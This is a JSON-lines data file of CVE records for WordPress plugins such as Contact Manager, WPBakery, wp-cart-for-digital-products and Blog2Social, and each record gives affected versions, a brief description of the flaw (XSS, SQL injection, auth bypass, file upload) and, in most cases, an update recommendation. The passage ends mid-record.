{"CVE_ID":"CVE-2025-8783","slug":"contact-manager","versionImpact":"8.6.5","versionEndExcluding":"8.6.6","description":"The Contact Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title\u2019 parameter in all versions up to, and including, 8.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 8.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-manager\\\/trunk\\\/admin-pages-functions.php#L524\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-manager\\\/trunk\\\/admin-pages-functions.php#L524\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3345750\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3345750\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e52a487-8e87-49b7-a044-9fb8452f3dd1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e52a487-8e87-49b7-a044-9fb8452f3dd1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3591","slug":"cf-geoplugin","versionEndExcluding":"8.6.5","description":"The Geo Controller WordPress plugin before 8.6.5 unserializes user input via some of its AJAX actions and REST API routes, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget is present on the blog.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f85d8b61-eaeb-433c-b857-06ee4db5c7d5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f85d8b61-eaeb-433c-b857-06ee4db5c7d5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1028","slug":"contact-manager","versionImpact":"8.6.4","versionEndExcluding":"8.6.5","description":"The Contact Manager plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the contact form upload feature in all versions up to, and including, 8.6.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible in specific configurations where the first extension is processed over the final. This vulnerability also requires successfully exploiting a race condition in order to exploit.","recommendation":"Update to version 8.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/contact-manager\\\/tags\\\/8.6.4&new_path=\\\/contact-manager\\\/tags\\\/8.6.5&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/contact-manager\\\/tags\\\/8.6.4&new_path=\\\/contact-manager\\\/tags\\\/8.6.5&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6f51a8e-4a59-4b64-b0c6-2ce3933a1df5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6f51a8e-4a59-4b64-b0c6-2ce3933a1df5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36833","slug":"indeed-membership-pro","versionImpact":"8.6","versionEndExcluding":"8.6.1","description":"The Indeed Membership Pro plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on various AJAX actions in versions 7.3 - 8.6. This makes it possible for authenticated attacker, with minimal permission, such as a subscriber, to perform a variety of actions such as modifying settings and viewing sensitive data.","recommendation":"Update to version 8.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab1cc1ef-d0e0-491d-91a8-eaa0605fc1da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab1cc1ef-d0e0-491d-91a8-eaa0605fc1da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9811025e-ab17-4255-aaaf-4f0306f5d281\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9811025e-ab17-4255-aaaf-4f0306f5d281\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36832","slug":"indeed-membership-pro","versionEndExcluding":"8.6.1","description":"The Ultimate Membership Pro plugin for WordPress is vulnerable to Authentication Bypass in versions between, and including, 7.3 to 8.6. This makes it possible for unauthenticated attackers to login as any user, including the site administrator with a default user ID of 1, via the username or user ID.","recommendation":"Update to version 8.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5341bbd-55bd-41ad-b5d1-d6b56c141277?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5341bbd-55bd-41ad-b5d1-d6b56c141277?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimate-membership-pro-wordpress-plugin\\\/12159253\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimate-membership-pro-wordpress-plugin\\\/12159253\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9811025e-ab17-4255-aaaf-4f0306f5d281\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9811025e-ab17-4255-aaaf-4f0306f5d281\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7502","slug":"js_composer","versionImpact":"8.5","versionEndExcluding":"8.6","description":"The WPBakery Page Builder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several shortcodes in all versions up to, and including, 8.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7c80143-c328-4cd1-95db-67de2edc058c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7c80143-c328-4cd1-95db-67de2edc058c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6136","slug":"wp-cart-for-digital-products","versionImpact":"8.5.5","versionEndExcluding":"8.5.6","description":"The wp-cart-for-digital-products WordPress plugin before 8.5.6 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 8.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d85cfe4-4878-4530-ba78-7cfe33f3a8d5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d85cfe4-4878-4530-ba78-7cfe33f3a8d5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6134","slug":"wp-cart-for-digital-products","versionImpact":"8.5.5","versionEndExcluding":"8.5.6","description":"The wp-cart-for-digital-products WordPress plugin before 8.5.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 8.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34d61f7e-90eb-4a64-a8a7-18f2d6518118\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34d61f7e-90eb-4a64-a8a7-18f2d6518118\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6133","slug":"wp-cart-for-digital-products","versionImpact":"8.5.5","versionEndExcluding":"8.5.6","description":"The wp-cart-for-digital-products WordPress plugin before 8.5.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 8.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd613e1e-557c-4383-a3e9-4c14bc0be0c5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd613e1e-557c-4383-a3e9-4c14bc0be0c5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6076","slug":"wp-cart-for-digital-products","versionImpact":"8.5.4","versionEndExcluding":"8.5.5","description":"The wp-cart-for-digital-products WordPress plugin before 8.5.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 8.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8369a2d8-1780-40c3-90ff-a826b9e9afd4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8369a2d8-1780-40c3-90ff-a826b9e9afd4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6075","slug":"wp-cart-for-digital-products","versionImpact":"8.5.4","versionEndExcluding":"8.5.5","description":"The wp-cart-for-digital-products WordPress plugin before 8.5.5 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 8.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0e2658a-b075-48b6-a9d9-e141194117fc\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0e2658a-b075-48b6-a9d9-e141194117fc\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6074","slug":"wp-cart-for-digital-products","versionImpact":"8.5.4","versionEndExcluding":"8.5.5","description":"The wp-cart-for-digital-products WordPress plugin before 8.5.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 8.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e518af46-cb8e-43ff-a7c1-5300b36d9113\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e518af46-cb8e-43ff-a7c1-5300b36d9113\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6073","slug":"wp-cart-for-digital-products","versionImpact":"8.5.4","versionEndExcluding":"8.5.5","description":"The wp-cart-for-digital-products WordPress plugin before 8.5.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 8.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f04994bc-9eef-46de-995b-8598f7a749c4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f04994bc-9eef-46de-995b-8598f7a749c4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6072","slug":"wp-cart-for-digital-products","versionImpact":"8.5.4","versionEndExcluding":"8.5.5","description":"The wp-cart-for-digital-products WordPress plugin before 8.5.5 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","recommendation":"Update to version 8.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d8a344b-37e9-41e8-9de0-c67b7ca8e21b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d8a344b-37e9-41e8-9de0-c67b7ca8e21b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6350","slug":"wpvr","versionImpact":"8.5.32","versionEndExcluding":"8.5.33","description":"The WP VR \u2013 360 Panorama and Free Virtual Tour Builder For WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018hotspot-hover\u2019 parameter in all versions up to, and including, 8.5.32 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 8.5.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvr\\\/trunk\\\/admin\\\/classes\\\/class-wpvr-ajax.php#L171\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvr\\\/trunk\\\/admin\\\/classes\\\/class-wpvr-ajax.php#L171\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3317520%40wpvr%2Ftrunk&old=3314284%40wpvr%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3317520%40wpvr%2Ftrunk&old=3314284%40wpvr%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce3d82ec-5f94-4511-a6ba-8ee1dec06160?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce3d82ec-5f94-4511-a6ba-8ee1dec06160?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9289","slug":"wp-wc-affiliate-program","versionImpact":"8.4.1","versionEndExcluding":"8.5.0","description":"The WordPress & WooCommerce Affiliate Program plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 8.4.1. This is due to the rtwwwap_login_request_callback() function not properly validating a user's identity prior to authenticating them to the site. This makes it possible for unauthenticated attackers to log in as any user, including administrators, granted they have access to the administrator's email.","recommendation":"Update to version 8.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed19835f-2718-41d8-95af-47c8b9589529?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed19835f-2718-41d8-95af-47c8b9589529?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-woocommerce-affiliate-program\\\/23580333\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-woocommerce-affiliate-program\\\/23580333\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4965","slug":"js_composer","versionImpact":"8.4.1","versionEndExcluding":"8.5","description":"The WPBakery Page Builder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Grid Builder feature in all versions up to, and including, 8.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0489172-279c-4397-a937-bca4840a196f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0489172-279c-4397-a937-bca4840a196f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4968","slug":"js_composer","versionImpact":"8.4.1","versionEndExcluding":"8.5","description":"The WPBakery Page Builder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple Page Builder elements (Copyright Element,  Hover Box, Separator With Text, FAQ, Single Image, Custom Header, Button, Call To Action, Progress Bar, Pie Chart, Round Chart, and Line Chart) in all versions up to, and including, 8.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10945855-675a-4a85-8bb2-84bc40c1b826?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10945855-675a-4a85-8bb2-84bc40c1b826?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4094","slug":"digits","versionEndExcluding":"8.4.6.1","description":"The DIGITS: WordPress Mobile Number Signup and Login WordPress plugin before 8.4.6.1 does not rate limit OTP validation attempts, making it straightforward for attackers to bruteforce them.","recommendation":"Update to version 8.4.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b5f0a263-644b-4954-a1f0-d08e2149edbb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b5f0a263-644b-4954-a1f0-d08e2149edbb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12417","slug":"simple-link-directory","versionImpact":"8.4.5","versionEndExcluding":"8.4.6","description":"The Simple Link Directory plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 8.4.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 8.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-link-directory\\\/trunk\\\/embed\\\/qcopd-embed-link.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-link-directory\\\/trunk\\\/embed\\\/qcopd-embed-link.php#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206971\\\/simple-link-directory\\\/trunk\\\/embed\\\/qcopd-embed-link.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206971\\\/simple-link-directory\\\/trunk\\\/embed\\\/qcopd-embed-link.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7112840-f190-4867-9408-c96408f28b7a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7112840-f190-4867-9408-c96408f28b7a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5673","slug":"blog2social","versionImpact":"8.4.4","versionEndExcluding":"8.4.5","description":"The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to SQL Injection via the \u2018prgSortPostType\u2019 parameter in all versions up to, and including, 8.4.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 8.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog2social\\\/tags\\\/8.4.4\\\/includes\\\/PRG\\\/Post\\\/Item.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog2social\\\/tags\\\/8.4.4\\\/includes\\\/PRG\\\/Post\\\/Item.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65b48fc0-27fd-4a37-afb8-2213ca0d4746?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65b48fc0-27fd-4a37-afb8-2213ca0d4746?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0439","slug":"nex-forms-express-wp-form-builder","versionEndExcluding":"8.4.4","description":"The NEX-Forms WordPress plugin before 8.4.4 does not escape its form name, which could lead to Stored Cross-Site Scripting issues. By default only SuperAdmins (in multisite) \/ admins (in single site) can create forms, however there is a setting allowing them to give lower roles access to this feature.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04cea9aa-b21c-49f8-836b-2d312253e09a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04cea9aa-b21c-49f8-836b-2d312253e09a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0203","slug":"digits","versionImpact":"8.4.1","versionEndExcluding":"8.4.2","description":"The Digits plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 8.4.1. This is due to missing nonce validation in the 'digits_save_settings' function. This makes it possible for unauthenticated attackers to modify the default role of registered users to elevate user privileges via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 8.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84f2afb4-f1c6-4313-8958-38f1b5140a67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84f2afb4-f1c6-4313-8958-38f1b5140a67?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/digits.unitedover.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/digits.unitedover.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4133","slug":"blog2social","versionImpact":"8.3.3","versionEndExcluding":"8.4.0","description":"The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 8.4.0 does not escape the title of posts when outputting them in a dashboard, which could allow users with the contributor role to perform Cross-Site Scripting attacks.","recommendation":"Update to version 8.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ebd7e5f5-af8d-42ca-b6ff-af92e03d4a3e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ebd7e5f5-af8d-42ca-b6ff-af92e03d4a3e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2114","slug":"nex-forms-express-wp-form-builder","versionEndExcluding":"8.4","description":"The NEX-Forms WordPress plugin before 8.4 does not properly escape the `table` parameter, which is populated with user input, before concatenating it to an SQL query.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d8ab3a5-1bf8-4216-91fa-e89541e5c43d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d8ab3a5-1bf8-4216-91fa-e89541e5c43d\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/SchmidAlex\\\/nex-forms_SQL-Injection\",\"name\":\"https:\\\/\\\/github.com\\\/SchmidAlex\\\/nex-forms_SQL-Injection\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7559","slug":"wp-file-manager-pro","versionImpact":"8.3.7","versionEndExcluding":"8.3.8","description":"The File Manager Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and capability checks in the mk_file_folder_manager AJAX action in all versions up to, and including, 8.3.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 8.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4b45791-4b85-4a2d-8019-1d438bd694cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4b45791-4b85-4a2d-8019-1d438bd694cb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/filemanagerpro.io\\\/file-manager-pro\\\/\",\"name\":\"https:\\\/\\\/filemanagerpro.io\\\/file-manager-pro\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5317","slug":"newsletter","versionImpact":"8.3.4","versionEndExcluding":"8.3.5","description":"The Newsletter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'np1' parameter in all versions up to, and including, 8.3.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 8.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4876e05e-efa6-46c6-832b-9ecc42934998?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4876e05e-efa6-46c6-832b-9ecc42934998?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095002\\\/newsletter\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095002\\\/newsletter\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6846","slug":"wp-file-manager-pro","versionImpact":"8.3.4","versionEndExcluding":"8.3.5","description":"The File Manager Pro plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 8.3.4 via the mk_check_filemanager_php_syntax AJAX function. This makes it possible for authenticated attackers, with subscriber access and above, to execute code on the server. Version 8.3.5 introduces a capability check that prevents users lower than admin from executing this function.","recommendation":"Update to version 8.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e8e0257-a745-495f-a103-c032b95209fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e8e0257-a745-495f-a103-c032b95209fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/gist.github.com\\\/Kun19\\\/046b2b305cac5f2edd38037984c2e8e3\",\"name\":\"https:\\\/\\\/gist.github.com\\\/Kun19\\\/046b2b305cac5f2edd38037984c2e8e3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0272","slug":"nex-forms-express-wp-form-builder","versionEndExcluding":"8.3.3","description":"The NEX-Forms WordPress plugin before 8.3.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/047b50c0-0eb3-4371-9e5d-3778fdafc66b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/047b50c0-0eb3-4371-9e5d-3778fdafc66b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0448","slug":"addons-for-elementor","versionImpact":"8.3.1","versionEndExcluding":"8.3.2","description":"The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget URL parameters in all versions up to, and including, 8.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 8.3.2, or a newer patched 